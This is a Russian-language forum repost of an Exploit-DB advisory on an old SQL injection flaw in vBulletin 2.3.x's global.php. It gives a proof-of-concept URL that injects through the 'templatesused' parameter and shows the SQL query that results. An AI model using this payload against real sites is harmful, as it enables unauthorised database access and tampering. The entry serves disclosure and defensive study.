Exploit vBulletin 2.3.x - 'global.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28694
Проверка EDB
  1. Пройдено
Автор
HACKERS PAL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5104
Дата публикации
2006-09-26
Код:
source: https://www.securityfocus.com/bid/20214/info

vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Version 2.3 is vulnerable; other versions may also be affected.

http://www.example.com/global.php?templatesused=nn,dd,'))/* 
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
Источник
www.exploit-db.com

Похожие темы